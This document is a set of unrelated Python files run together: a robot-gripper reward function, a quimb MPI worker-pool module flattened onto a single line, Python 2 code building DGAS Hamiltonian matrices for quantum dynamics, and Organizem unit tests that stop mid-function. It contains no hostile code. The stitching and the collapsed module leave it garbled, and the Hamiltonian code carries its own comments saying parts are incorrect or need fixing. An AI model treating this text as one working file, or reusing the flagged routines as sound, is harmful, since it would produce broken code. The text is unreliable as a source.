        tcp_obj_norm_x_z = np.linalg.norm(tcp_xz - obj_position_x_z, ord=2)

        init_obj_x_z = self.obj_init_pos + np.array([0., -self.obj_init_pos[1], 0.])
        init_tcp_x_z = self.init_tcp + np.array([0., -self.init_tcp[1], 0.])

        tcp_obj_x_z_margin = np.linalg.norm(init_obj_x_z - init_tcp_x_z, ord=2) \
            - x_z_success_margin
        x_z_caging = reward_utils.tolerance(tcp_obj_norm_x_z,
                                            bounds=(0, x_z_success_margin),
                                            margin=tcp_obj_x_z_margin,
                                            sigmoid='long_tail',)

        # Fixed: validate the freshly computed x-z term (previously this line
        # re-checked right_caging, a copy-paste slip that left x_z_caging
        # unvalidated).
        assert x_z_caging >= 0 and x_z_caging <= 1

        gripper_closed = min(max(0, action[-1]), 1)
        assert gripper_closed >= 0 and gripper_closed <= 1

        caging = reward_utils.hamacher_product(y_caging, x_z_caging)
        assert caging >= 0 and caging <= 1

        # Only count the grip term once the object is almost fully caged.
        if caging > 0.95:
            gripping = y_gripping
        else:
            gripping = 0.
        assert gripping >= 0 and gripping <= 1

        caging_and_gripping = (caging + gripping) / 2
        assert caging_and_gripping >= 0 and caging_and_gripping <= 1

        return caging_and_gripping

    def compute_reward(self, action, obs):
        """Return (reward, tcp_to_obj, tcp_opened, target_to_obj,
        object_grasped, in_place) for the current observation."""
        obj = obs[4:7]
        tcp_opened = obs[3]
        tcp_to_obj = np.linalg.norm(obj - self.tcp_center)
        target_to_obj = np.linalg.norm(obj - self._target_pos)
        target_to_obj_init = np.linalg.norm(self.obj_init_pos - self._target_pos)

        in_place = reward_utils.tolerance(
            target_to_obj,
            bounds=(0, self.TARGET_RADIUS),
            margin=target_to_obj_init,
            sigmoid='long_tail',
        )

        object_grasped = self._gripper_caging_reward(action, obj, self.OBJ_RADIUS)

        reward = reward_utils.hamacher_product(object_grasped, in_place)

        # Bonus once the gripper is at the object, partially closed, and the
        # object has actually moved toward the target.
        if (tcp_to_obj < 0.01) and (0 < tcp_opened < 0.55) and \
                (target_to_obj_init - target_to_obj > 0.01):
            reward += 1. + 5. * in_place
        if target_to_obj < self.TARGET_RADIUS:
            reward = 10.
        return (
            reward,
            tcp_to_obj,
            tcp_opened,
            target_to_obj,
            object_grasped,
            in_place
        )
"""Manages the spawning of mpi processes to send to the various solvers. """ import os import functools import numpy as np from .slepc_linalg import ( eigs_slepc, svds_slepc, mfn_multiply_slepc, ssolve_slepc, ) from ..core import _NUM_THREAD_WORKERS # Work out if already running as mpi if ('OMPI_COMM_WORLD_SIZE' in os.environ) or ('PMI_SIZE' in os.environ): ALREADY_RUNNING_AS_MPI = True if '_QUIMB_MPI_LAUNCHED' not in os.environ: raise RuntimeError( "For the moment, quimb programs launched explicitly" " using MPI need to use `quimb-mpi-python`.") USE_SYNCRO = "QUIMB_SYNCRO_MPI" in os.environ else: ALREADY_RUNNING_AS_MPI = False USE_SYNCRO = False # Work out the desired total number of workers for _NUM_MPI_WORKERS_VAR in ['QUIMB_NUM_MPI_WORKERS', 'QUIMB_NUM_PROCS', 'OMPI_COMM_WORLD_SIZE', 'PMI_SIZE', 'OMP_NUM_THREADS']: if _NUM_MPI_WORKERS_VAR in os.environ: NUM_MPI_WORKERS = int(os.environ[_NUM_MPI_WORKERS_VAR]) break else: import psutil _NUM_MPI_WORKERS_VAR = 'psutil' NUM_MPI_WORKERS = psutil.cpu_count(logical=False) def bcast(result, comm, result_rank): """Broadcast a result to all workers, dispatching to proper MPI (rather than pickled) communication if the result is a numpy array. 
""" rank = comm.Get_rank() # make sure all workers know if result is an array or not if rank == result_rank: is_ndarray = isinstance(result, np.ndarray) else: is_ndarray = None is_ndarray = comm.bcast(is_ndarray, root=result_rank) # standard (pickle) bcast if not array if not is_ndarray: return comm.bcast(result, root=result_rank) # make sure all workers have shape and dtype if rank == result_rank: shape_dtype = result.shape, str(result.dtype) else: shape_dtype = None shape_dtype = comm.bcast(shape_dtype, root=result_rank) shape, dtype = shape_dtype # allocate data space if rank != result_rank: result = np.empty(shape, dtype=dtype) # use fast communication for main array comm.Bcast(result, root=result_rank) return result class SyncroFuture: def __init__(self, result, result_rank, comm): self._result = result self.result_rank = result_rank self.comm = comm def result(self): rank = self.comm.Get_rank() if rank == self.result_rank: should_it = (isinstance(self._result, tuple) and any(isinstance(x, np.ndarray) for x in self._result)) if should_it: iterate_over = len(self._result) else: iterate_over = 0 else: iterate_over = None iterate_over = self.comm.bcast(iterate_over, root=self.result_rank) if iterate_over: if rank != self.result_rank: self._result = (None,) * iterate_over result = tuple(bcast(x, self.comm, self.result_rank) for x in self._result) else: result = bcast(self._result, self.comm, self.result_rank) return result @staticmethod def cancel(): raise ValueError("SyncroFutures cannot be cancelled - they are " "submitted in a parallel round-robin fasion where " "each worker immediately computes all its results.") class SynchroMPIPool: def __init__(self): import itertools from mpi4py import MPI self.comm = MPI.COMM_WORLD self.size = self.comm.Get_size() self.rank = self.comm.Get_rank() self.counter = itertools.cycle(range(0, NUM_MPI_WORKERS)) self._max_workers = self.size def submit(self, fn, *args, **kwargs): # round robin iterate through ranks current_counter 
= next(self.counter) # accept job and compute if have the same rank, else do nothing if current_counter == self.rank: res = fn(*args, **kwargs) else: res = None # wrap the result in a SyncroFuture, that will broadcast result return SyncroFuture(res, current_counter, self.comm) def shutdown(self): pass class CachedPoolWithShutdown: """Decorator for caching the mpi pool when called with the equivalent args, and shutting down previous ones when not needed. """ def __init__(self, pool_fn): self._settings = '__UNINITIALIZED__' self._pool_fn = pool_fn def __call__(self, num_workers=None, num_threads=1): # convert None to default so the cache the same if num_workers is None: num_workers = NUM_MPI_WORKERS elif ALREADY_RUNNING_AS_MPI and (num_workers != NUM_MPI_WORKERS): raise ValueError("Can't specify number of processes when running " "under MPI rather than spawning processes.") # first call if self._settings == '__UNINITIALIZED__': self._pool = self._pool_fn(num_workers, num_threads) self._settings = (num_workers, num_threads) # new type of pool requested elif self._settings != (num_workers, num_threads): self._pool.shutdown() self._pool = self._pool_fn(num_workers, num_threads) self._settings = (num_workers, num_threads) return self._pool @CachedPoolWithShutdown def get_mpi_pool(num_workers=None, num_threads=1): """Get the MPI executor pool, with specified number of processes and threads per process. """ if (num_workers == 1) and (num_threads == _NUM_THREAD_WORKERS): from concurrent.futures import ProcessPoolExecutor return ProcessPoolExecutor(1) if USE_SYNCRO: return SynchroMPIPool() from mpi4py.futures import MPIPoolExecutor return MPIPoolExecutor(num_workers, main=False, env={'OMP_NUM_THREADS': str(num_threads), 'QUIMB_NUM_MPI_WORKERS': str(num_workers), '_QUIMB_MPI_LAUNCHED': 'SPAWNED'}) class GetMPIBeforeCall(object): """Wrap a function to automatically get the correct communicator before its called, and to set the `comm_self` kwarg to allow forced self mode. 
This is called by every mpi process before the function evaluation. """ def __init__(self, fn): self.fn = fn def __call__(self, *args, comm_self=False, wait_for_workers=None, **kwargs): """ Parameters ---------- *args : Supplied to self.fn comm_self : bool, optional Whether to force use of MPI.COMM_SELF wait_for_workers : int, optional If set, wait for the communicator to have this many workers, this can help to catch some errors regarding expected worker numbers. **kwargs : Supplied to self.fn """ from mpi4py import MPI if not comm_self: comm = MPI.COMM_WORLD else: comm = MPI.COMM_SELF if wait_for_workers is not None: from time import time t0 = time() while comm.Get_size() != wait_for_workers: if time() - t0 > 2: raise RuntimeError( f"Timeout while waiting for {wait_for_workers} " f"workers to join comm {comm}.") comm.Barrier() res = self.fn(*args, comm=comm, **kwargs) comm.Barrier() return res class SpawnMPIProcessesFunc(object): """Automatically wrap a function to be executed in parallel by a pool of mpi workers. This is only called by the master mpi process in manual mode, only by the (non-mpi) spawning process in automatic mode, or by all processes in syncro mode. """ def __init__(self, fn): self.fn = fn def __call__(self, *args, num_workers=None, num_threads=1, mpi_pool=None, spawn_all=USE_SYNCRO or (not ALREADY_RUNNING_AS_MPI), **kwargs): """ Parameters ---------- *args Supplied to `self.fn`. num_workers : int, optional How many total process should run function in parallel. num_threads : int, optional How many (OMP) threads each process should use mpi_pool : pool-like, optional If not None (default), submit function to this pool. spawn_all : bool, optional Whether all the parallel processes should be spawned (True), or num_workers - 1, so that the current process can also do work. **kwargs Supplied to `self.fn`. Returns ------- `fn` output from the master process. 
""" if num_workers is None: num_workers = NUM_MPI_WORKERS if num_workers == 1: # no pool or communicator required return self.fn(*args, comm_self=True, **kwargs) kwargs['wait_for_workers'] = num_workers if mpi_pool is not None: pool = mpi_pool else: pool = get_mpi_pool(num_workers, num_threads) # the (non mpi) main process is idle while the workers compute. if spawn_all: futures = [pool.submit(self.fn, *args, **kwargs) for _ in range(num_workers)] results = [f.result() for f in futures] # the master process is the master mpi process and contributes else: futures = [pool.submit(self.fn, *args, **kwargs) for _ in range(num_workers - 1)] results = ([self.fn(*args, **kwargs)] + [f.result() for f in futures]) # Get master result, (not always first submitted) return next(r for r in results if r is not None) # ---------------------------------- SLEPC ---------------------------------- # eigs_slepc_mpi = functools.wraps(eigs_slepc)( GetMPIBeforeCall(eigs_slepc)) eigs_slepc_spawn = functools.wraps(eigs_slepc)( SpawnMPIProcessesFunc(eigs_slepc_mpi)) svds_slepc_mpi = functools.wraps(svds_slepc)( GetMPIBeforeCall(svds_slepc)) svds_slepc_spawn = functools.wraps(svds_slepc)( SpawnMPIProcessesFunc(svds_slepc_mpi)) mfn_multiply_slepc_mpi = functools.wraps(mfn_multiply_slepc)( GetMPIBeforeCall(mfn_multiply_slepc)) mfn_multiply_slepc_spawn = functools.wraps(mfn_multiply_slepc)( SpawnMPIProcessesFunc(mfn_multiply_slepc_mpi)) ssolve_slepc_mpi = functools.wraps(ssolve_slepc)( GetMPIBeforeCall(ssolve_slepc)) ssolve_slepc_spawn = functools.wraps(ssolve_slepc)( SpawnMPIProcessesFunc(ssolve_slepc_mpi))
# NOTE(review): this file is Python 2 (print statements, dict.itervalues());
# comments below annotate without porting.
import numpy as np
import pyspawn.complexgaussian as cg

######################################################
# adiabatic Hamiltonian
######################################################

# These functions all take `self` as the first argument: they appear to be
# written for attachment to a simulation class that provides self.traj,
# self.centroids, self.traj_map etc. -- TODO confirm against the full package.

# build Heff for the first half of the time step in the adiabatic rep
# (with NPI)
def build_Heff_first_half(self):
    self.get_qm_data_from_h5()
    self.get_qm_data_from_h5_next_time()

    # evaluate matrices at the half step t + dt/2
    qm_time = self.get_quantum_time()
    dt = self.get_timestep()
    t_half = qm_time + 0.5 * dt
    self.set_quantum_time_half_step(t_half)
    self.get_qm_data_from_h5_half_step()

    self.build_DGAS_coeffs()
    self.build_S_elec_DGAS()
    self.build_S_DGAS()
    self.invert_S()
    self.build_Sdot_nuc_DGAS()
    self.build_Sdot_elec_DGAS()
    self.build_Sdot_DGAS()
    self.build_H_DGAS()

    self.build_Heff()

# build Heff for the second half of the time step in the adiabatic rep
# (with NPI)
def build_Heff_second_half(self):
    self.get_qm_data_from_h5()

    # evaluate matrices at the half step t - dt/2
    qm_time = self.get_quantum_time()
    dt = self.get_timestep()
    t_half = qm_time - 0.5 * dt
    self.set_quantum_time_half_step(t_half)
    self.get_qm_data_from_h5_half_step()

    # don't need to do this - fix soon
    self.build_DGAS_coeffs()

    # NOTE(review): build_Sdot_DGAS is called twice here and
    # build_Sdot_nuc_DGAS/build_Sdot_elec_DGAS are never called, unlike the
    # first-half routine above -- looks suspicious, verify intended ordering.
    self.build_S_elec_DGAS()
    self.build_Sdot_DGAS()
    self.build_S_DGAS()
    self.invert_S()
    self.build_Sdot_DGAS()
    self.build_H_DGAS()

    self.build_Heff()

# get the position at the next time step
def get_qm_data_from_h5_next_time(self):
    qm_time = self.get_quantum_time() + self.get_timestep()

    ntraj = self.get_num_traj_qm()
    for key in self.traj:
        if self.traj_map[key] < ntraj:
            self.traj[key].get_all_qm_data_at_time_from_h5(qm_time,suffix="_next")
    for key in self.centroids:
        # centroid keys have the form "<traj1>_a_<traj2>"
        key1, key2 = str.split(key,"_a_")
        if self.traj_map[key1] < ntraj and self.traj_map[key2] < ntraj:
            self.centroids[key].get_all_qm_data_at_time_from_h5(qm_time,suffix="_next")

# build DGAS coefficients
def build_DGAS_coeffs(self):
    ntraj = self.get_num_traj_qm()
    # Python 2 idiom: numstates from an arbitrary trajectory (assumes all
    # trajectories share the same number of electronic states).
    nstat = self.traj.itervalues().next().get_numstates()
    #dc = dict()
    #for keyi in self.traj:
    #    i = self.traj_map[keyi]
    #    if i < ntraj:
    #        nstat = self.traj[keyi].get_numstates()
    #        ist = self.traj[keyi].get_istate()
    #        dc[keyi] = np.zeros(nstat)
    #        dc[keyi][ist] = 1.0
    #self.dgas_coeffs = np.zeros((ntraj,nstat))
    #for keyi in self.traj:
    #    i = self.traj_map[keyi]
    #    if i < ntraj:
    #        self.dgas_coeffs[i,:] = dc[keyi]
    # dgas_coeffs[i,j,:] is the electronic coefficient vector of trajectory i
    # evaluated at centroid (i,j); here each is a unit vector on the
    # trajectory's own adiabatic state.
    self.dgas_coeffs = np.zeros((ntraj,ntraj,nstat))
    self.dgas_coeffs_next_time = np.zeros((ntraj,ntraj,nstat))
    for keycent in self.centroids:
        keyi, keyj = str.split(keycent,"_a_")
        i = self.traj_map[keyi]
        j = self.traj_map[keyj]
        if i < ntraj and j < ntraj:
            #nstat = self.traj[keyi].get_numstates()
            ist = self.traj[keyi].get_istate()
            jst = self.traj[keyj].get_istate()
            dc = np.zeros(nstat)
            dc[ist] = 1.0
            self.dgas_coeffs[i,j,:] = dc
            dc = np.zeros(nstat)
            dc[jst] = 1.0
            self.dgas_coeffs[j,i,:] = dc
            dc = np.zeros(nstat)
            dc[ist] = 1.0
            self.dgas_coeffs_next_time[i,j,:] = dc
            dc = np.zeros(nstat)
            dc[jst] = 1.0
            self.dgas_coeffs_next_time[j,i,:] = dc
    #for keycent in self.centroids:
    #    keyi, keyj = str.split(keycent,"_a_")
    #    i = self.traj_map[keyi]
    #    j = self.traj_map[keyj]
    #    if i < ntraj and j < ntraj:
    # self.dgas_coeffs[i,j,:] is the DGAS coefficient vector for
    # the elec wf of trajectory i at centroid i,j.  Thus,
    # self.dgas_coeffs[i,j,:] /= self.dgas_coeffs[j,i,:]
    #        self.dgas_coeffs[i,j,:] = dc[keyi]

# build matrix of electronic overlaps
def build_S_elec_DGAS(self):
    ntraj = self.get_num_traj_qm()
    self.S_elec = np.zeros((ntraj,ntraj))
    for keyi in self.traj:
        i = self.traj_map[keyi]
        if i < ntraj:
            for keyj in self.traj:
                j = self.traj_map[keyj]
                if j < ntraj:
                    if i == j:
                        # electronic wavefunctions are normalized
                        self.S_elec[i,j] = 1.0
                    else:
                        Stmp = np.dot(self.dgas_coeffs[i,j,:],self.dgas_coeffs[j,i,:])
                        self.S_elec[i,j] = Stmp

# build the overlap matrix, S
def build_S_DGAS(self):
    ntraj = self.get_num_traj_qm()
    self.S = np.zeros((ntraj,ntraj), dtype=np.complex128)
    self.S_nuc = np.zeros((ntraj,ntraj), dtype=np.complex128)
    for keyi in self.traj:
        i = self.traj_map[keyi]
        if i < ntraj:
            for keyj in self.traj:
                j = self.traj_map[keyj]
                if j < ntraj:
                    # total overlap = nuclear overlap * electronic overlap
                    self.S_nuc[i,j] = cg.overlap_nuc(self.traj[keyi], self.traj[keyj],positions_i="positions_qm",positions_j="positions_qm",momenta_i="momenta_qm",momenta_j="momenta_qm")
                    self.S[i,j] = self.S_nuc[i,j] * self.S_elec[i,j]

# build the right-acting time derivative operator
def build_Sdot_nuc_DGAS(self):
    ntraj = self.get_num_traj_qm()
    self.Sdot_nuc = np.zeros((ntraj,ntraj), dtype=np.complex128)
    for keyi in self.traj:
        i = self.traj_map[keyi]
        if i < ntraj:
            for keyj in self.traj:
                j = self.traj_map[keyj]
                if j < ntraj:
                    self.Sdot_nuc[i,j] = cg.Sdot_nuc(self.traj[keyi], self.traj[keyj],positions_i="positions_qm",positions_j="positions_qm",momenta_i="momenta_qm",momenta_j="momenta_qm",forces_j="forces_i_qm") * self.S_elec[i,j]

# electronic part of the time-derivative overlap, via the NPI finite
# difference between the current and next-time DGAS coefficients
def build_Sdot_elec_DGAS(self):
    ntraj = self.get_num_traj_qm()
    nstat = self.traj.itervalues().next().get_numstates()
    self.Sdot_elec = np.zeros((ntraj,ntraj), dtype=np.complex128)
    for keycent in self.centroids:
        keyi, keyj = str.split(keycent,"_a_")
        i = self.traj_map[keyi]
        j = self.traj_map[keyj]
        if i < ntraj and j < ntraj:
            # calculate NPI derivative coupling (as defined in the DGAS paper)
            S_ad = self.centroids[keycent].get_S_elec_flat().reshape((nstat,nstat))
            print "S_ad", S_ad
            # overlaps between current and next-time electronic vectors
            sii = np.dot(self.dgas_coeffs[i,j,:],np.matmul(S_ad,self.dgas_coeffs_next_time[i,j,:]))
            sjj = np.dot(self.dgas_coeffs[j,i,:],np.matmul(S_ad,self.dgas_coeffs_next_time[j,i,:]))
            sij = np.dot(self.dgas_coeffs[i,j,:],np.matmul(S_ad,self.dgas_coeffs_next_time[j,i,:]))
            sji = np.dot(self.dgas_coeffs[j,i,:],np.matmul(S_ad,self.dgas_coeffs_next_time[i,j,:]))
            print "sii", sii, sij, sji, sjj
            vinorm = np.sqrt(1.0 - sii*sii)
            vjnorm = np.sqrt(1.0 - sjj*sjj)
            xixj = np.dot(self.dgas_coeffs[i,j,:],self.dgas_coeffs[j,i,:])
            # guard against division by a vanishing complement norm
            if vjnorm < 1.0e-6:
                xivj = 0.0
            else:
                xivj = (sij - xixj * sjj) / vjnorm
            if vinorm < 1.0e-6:
                vixj = 0.0
            else:
                vixj = (sji - xixj * sii) / vinorm
            xixj_next = np.dot(self.dgas_coeffs_next_time[i,j,:],self.dgas_coeffs_next_time[j,i,:])
            if vjnorm >= 1.0e-6 and vinorm >= 1.0e-6:
                vivj = (xixj_next - sii*sij - sji*sjj + sii*xixj*sjj) / (vinorm*vjnorm)
            else:
                vivj = 0.0
            print "xixj", xixj, xivj, vixj, vivj
            acii = np.arccos(sii)
            acjj = np.arccos(sjj)
            print "acii, acjj", acii, acjj
            #ADtmp = acjj*acjj-acii*acii
            # sinc-like factors with the small-argument limit handled explicitly
            BCtmp1 = acii-acjj
            BCtmp2 = acii+acjj
            if np.absolute(BCtmp1) < 1.0e-6:
                BCtmp3 = 1.0
            else:
                BCtmp3 = np.sin(BCtmp1) / BCtmp1
            if np.absolute(BCtmp2) < 1.0e-6:
                BCtmp4 = 1.0
            else:
                BCtmp4 = np.sin(BCtmp2) / BCtmp2
            B = 0.5 * xivj * acjj * (BCtmp3 + BCtmp4)
            C = -0.5 * vixj * acjj * (BCtmp3 + BCtmp4)
            # degenerate branch when sii ~ sjj (denominator would vanish)
            if np.absolute(sjj-sii) < 1.0e-6:
                A = xixj * acjj * (sii*sjj-1.0)
                D = vivj * acjj * (sii*sjj-1.0)
            else:
                A = xixj * acjj * (np.sqrt((1.0-sii*sii)*(1.0-sjj*sjj))*acii + (sii*sjj-1.0)*acjj) / (acjj*acjj-acii*acii)
                D = vivj * acjj * (np.sqrt((1.0-sii*sii)*(1.0-sjj*sjj))*acjj + (sii*sjj-1.0)*acii) / (acjj*acjj-acii*acii)
            h = self.traj[keyi].get_timestep()
            print "ABCDh", A, B, C, D, h
            Sdot_tmp = 1.0 / h * ( A + B + C + D )
            self.Sdot_elec[i,j] = self.S_nuc[i,j] * Sdot_tmp
            print "self.Sdot_elec[i,j]", i, j, self.Sdot_elec[i,j], self.Sdot_nuc[i,j]
            # THIS IS NOT CORRECT!
            #self.Sdot_elec[j,i] = -1.0*np.conj(self.Sdot_elec[i,j])
            #print "self.Sdot_elec[j,i]", i, j, self.Sdot_elec[j,i], self.Sdot_nuc[i,j]
            # Compute [j,i] elements correctly!
            # Swap the i/j roles of the overlaps and repeat the NPI formula.
            stmp = sii
            sii = sjj
            sjj = stmp
            stmp = sij
            sij = sji
            sji = stmp
            print "sii", sii, sij, sji, sjj
            vinorm = np.sqrt(1.0 - sii*sii)
            vjnorm = np.sqrt(1.0 - sjj*sjj)
            xixj = np.dot(self.dgas_coeffs[j,i,:],self.dgas_coeffs[i,j,:])
            if vjnorm < 1.0e-6:
                xivj = 0.0
            else:
                xivj = (sij - xixj * sjj) / vjnorm
            if vinorm < 1.0e-6:
                vixj = 0.0
            else:
                vixj = (sji - xixj * sii) / vinorm
            xixj_next = np.dot(self.dgas_coeffs_next_time[j,i,:],self.dgas_coeffs_next_time[i,j,:])
            if vjnorm >= 1.0e-6 and vinorm >= 1.0e-6:
                vivj = (xixj_next - sii*sij - sji*sjj + sii*xixj*sjj) / (vinorm*vjnorm)
            else:
                vivj = 0.0
            print "xixj", xixj, xivj, vixj, vivj
            acii = np.arccos(sii)
            acjj = np.arccos(sjj)
            print "acii, acjj", acii, acjj
            #ADtmp = acjj*acjj-acii*acii
            BCtmp1 = acii-acjj
            BCtmp2 = acii+acjj
            if np.absolute(BCtmp1) < 1.0e-6:
                BCtmp3 = 1.0
            else:
                BCtmp3 = np.sin(BCtmp1) / BCtmp1
            if np.absolute(BCtmp2) < 1.0e-6:
                BCtmp4 = 1.0
            else:
                BCtmp4 = np.sin(BCtmp2) / BCtmp2
            B = 0.5 * xivj * acjj * (BCtmp3 + BCtmp4)
            C = -0.5 * vixj * acjj * (BCtmp3 + BCtmp4)
            if np.absolute(sjj-sii) < 1.0e-6:
                A = xixj * acjj * (sii*sjj-1.0)
                D = vivj * acjj * (sii*sjj-1.0)
            else:
                A = xixj * acjj * (np.sqrt((1.0-sii*sii)*(1.0-sjj*sjj))*acii + (sii*sjj-1.0)*acjj) / (acjj*acjj-acii*acii)
                D = vivj * acjj * (np.sqrt((1.0-sii*sii)*(1.0-sjj*sjj))*acjj + (sii*sjj-1.0)*acii) / (acjj*acjj-acii*acii)
            h = self.traj[keyi].get_timestep()
            print "ABCDh", A, B, C, D, h
            Sdot_tmp = 1.0 / h * ( A + B + C + D )
            self.Sdot_elec[j,i] = self.S_nuc[j,i] * Sdot_tmp
            print "self.Sdot_elec[j,i]", i, j, self.Sdot_elec[j,i], self.Sdot_nuc[j,i]

# total time-derivative overlap = nuclear part + electronic part
def build_Sdot_DGAS(self):
    self.Sdot = self.Sdot_nuc + self.Sdot_elec

# build the Hamiltonian matrix, H
# This routine assumes that S is already built
def build_H_DGAS(self):
    print "# building potential energy matrix"
    self.build_V_DGAS()

    print "# building NAC matrix"
    #self.build_tau_DGAS()

    print "# building kinetic energy matrix"
    self.build_T_DGAS()

    ntraj = self.get_num_traj_qm()
    # constant diagonal energy shift (improves numerical conditioning)
    shift = self.get_qm_energy_shift() * np.identity(ntraj)

    print "# summing Hamiltonian"
    #self.H = self.T + self.V + self.tau + shift
    self.H = self.T + self.V + shift

# build the potential energy matrix, V
# This routine assumes that S is already built
def build_V_DGAS(self):
    # NOTE(review): c1i/cm1i are unused in this routine (leftovers from the
    # commented-out tau construction below).
    c1i = (complex(0.0,1.0))
    cm1i = (complex(0.0,-1.0))
    ntraj = self.get_num_traj_qm()
    self.V = np.zeros((ntraj,ntraj),dtype=np.complex128)
    # diagonal: each trajectory's own adiabatic energy
    for key in self.traj:
        i = self.traj_map[key]
        istate = self.traj[key].get_istate()
        if i < ntraj:
            self.V[i,i] = self.traj[key].get_energies_qm()[istate]
    # off-diagonal: centroid energies weighted by the DGAS coefficients
    for key in self.centroids:
        keyi, keyj = str.split(key,"_a_")
        i = self.traj_map[keyi]
        j = self.traj_map[keyj]
        if i < ntraj and j < ntraj:
            istate = self.centroids[key].get_istate()
            jstate = self.centroids[key].get_jstate()
            nstates = self.centroids[key].get_numstates()
            #if istate == jstate:
            #BGL this is not correct and must be fixed later
            E = self.centroids[key].get_energies_qm()
            for ist in range(nstates):
                Etmp = self.dgas_coeffs[i,j,ist] * self.dgas_coeffs[j,i,ist] * E[ist]
                self.V[i,j] += Etmp * self.S_nuc[i,j]
                self.V[j,i] += Etmp * self.S_nuc[j,i]

# build the nonadiabatic coupling matrix, tau
# This routine assumes that S is already built
#def build_tau_DGAS(self):
#    c1i = (complex(0.0,1.0))
#    cm1i = (complex(0.0,-1.0))
#    ntraj = self.get_num_traj_qm()
#    self.tau = np.zeros((ntraj,ntraj),dtype=np.complex128)
#    for key in self.centroids:
#        keyi, keyj = str.split(key,"_a_")
#        i = self.traj_map[keyi]
#        j = self.traj_map[keyj]
#        if i < ntraj and j < ntraj:
#            istate = self.centroids[key].get_istate()
#            jstate = self.centroids[key].get_jstate()
#            if istate != jstate:
#                Sij = cg.overlap_nuc(self.traj[keyi], self.traj[keyj],positions_i="positions_qm",positions_j="positions_qm",momenta_i="momenta_qm",momenta_j="momenta_qm")
#                tdc = self.centroids[key].get_timederivcoups_qm()[jstate]
#                self.tau[i,j] = Sij * cm1i * tdc
#                self.tau[j,i] = Sij.conjugate() * c1i * tdc

# build the kinetic energy matrix, T
def build_T_DGAS(self):
    ntraj = self.get_num_traj_qm()
    self.T = np.zeros((ntraj,ntraj), dtype=np.complex128)
    for keyi in self.traj:
        i = self.traj_map[keyi]
        if i < ntraj:
            for keyj in self.traj:
                j = self.traj_map[keyj]
                if j < ntraj:
                    # nuclear kinetic matrix element scaled by electronic overlap
                    self.T[i,j] = cg.kinetic_nuc(self.traj[keyi], self.traj[keyj],positions_i="positions_qm",positions_j="positions_qm",momenta_i="momenta_qm",momenta_j="momenta_qm") * self.S_elec[i,j]
"""Unit tests for Organizem: adding/finding/removing items, element
reports, grouping, regrouping the data file, and backup.

Fixes applied in review:
* ``test_backup`` previously discarded the ``filecmp.cmp`` result, so the
  test asserted nothing; the result is now asserted.
* ``test_remove_items_rgx_by_note`` lacked ``use_regex_match=True`` in its
  final ``assertFalse``, so it searched for the literal pattern string and
  passed vacuously.
* Descending regroup tests called ``.reverse()`` directly on ``dict.keys()``,
  which fails on Python 3 (views have no ``reverse``); keys are now copied
  into a list first.
* Regex pattern literals use raw strings; ``assertTrue(a == b)`` style
  assertions replaced with ``assertEqual``/``assertIsNotNone`` for clearer
  failure messages.
"""
import filecmp
import unittest
import sys
sys.path.insert(0, '..')
from lib.item import Item, Elem
from lib.organizem import Organizem, Conf
from lib.orgm_controller_base import ActionArg

TEST_DATA_FILE = "orgm_test.dat"
TEST_BAK_FILE = "orgm_test_bak.dat"
IS_UNIT_TESTING = True

# Point the backup target at the test backup file before any test runs.
Organizem(TEST_DATA_FILE, IS_UNIT_TESTING).setconf(Conf.BAK_FILE, TEST_BAK_FILE)


class OrganizemTestCase(unittest.TestCase):

    # Helpers
    def _init_test_data_file(self):
        # Reset the data file to a single dummy "TEST_ITEM" so each test
        # starts from a known state.
        with open(TEST_DATA_FILE, 'w') as f:
            item = Item("TEST_ITEM")
            f.write(str(item))

    # Tests
    def test_init_item(self):
        title = "title"
        item = Item(title)
        self.assertIsNotNone(item)
        self.assertIsInstance(item, Item)
        self.assertEqual(item.title, title)

    def test_init_organizem(self):
        self._init_test_data_file()
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        self.assertIsNotNone(orgm)
        self.assertIsInstance(orgm, Organizem)
        self.assertEqual(orgm.data_file, TEST_DATA_FILE)

    def test_add_item__find_item_by_title(self):
        self._init_test_data_file()
        title = "title"
        item = Item(title)
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.TITLE, title))

    def test_add_item__find_rgx_item_by_title(self):
        self._init_test_data_file()
        title = "title"
        rgx_match = "titl*"
        item = Item(title)
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.TITLE, rgx_match,
                                        use_regex_match=True))

    def test_add_item__find_items_by_area(self):
        self._init_test_data_file()
        title = "title"
        area = "my area"
        item = Item(title, {Elem.AREA: area})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.AREA, area))

    def test_add_item__find_rgx_item_by_area(self):
        self._init_test_data_file()
        title = "title"
        area = "area"
        rgx_match = "are*"
        item = Item(title, {Elem.AREA: area})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.AREA, rgx_match,
                                        use_regex_match=True))

    def test_add_item__find_items_by_project(self):
        self._init_test_data_file()
        title = "title"
        project = "my project"
        item = Item(title, {Elem.PROJECT: project})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.PROJECT, project))

    def test_add_item__find_rgx_items_by_project(self):
        self._init_test_data_file()
        title = "title"
        project = "my project"
        rgx_match = "my proj*"
        item = Item(title, {Elem.PROJECT: project})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.PROJECT, rgx_match,
                                        use_regex_match=True))

    def test_add_item__find_items_by_tags(self):
        self._init_test_data_file()
        title = "title"
        # Test case of single-value passed to find_items() for a
        # element that is stored in item as a list (tags)
        tag1 = 'tag 1'
        tags1 = [tag1]
        item1 = Item(title, {Elem.TAGS: tags1})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        self.assertTrue(orgm.find_items(Elem.TAGS, tag1))
        # Test case of multi-value list passed to find_items() for a
        # element that is stored in item as a list (tags)
        tag2 = 'tag 2'
        tags2 = [tag1, tag2]
        item2 = Item(title, {Elem.TAGS: tags2})
        orgm.add_item(item2)
        self.assertTrue(orgm.find_items(Elem.TAGS, tag2))
        self.assertTrue(orgm.find_items(Elem.TAGS, tags2))

    def test_add_item__find_rgx_items_by_tags(self):
        self._init_test_data_file()
        title = "title"
        # Test case of single-value passed to find_items() for a
        # element that is stored in item as a list (tags)
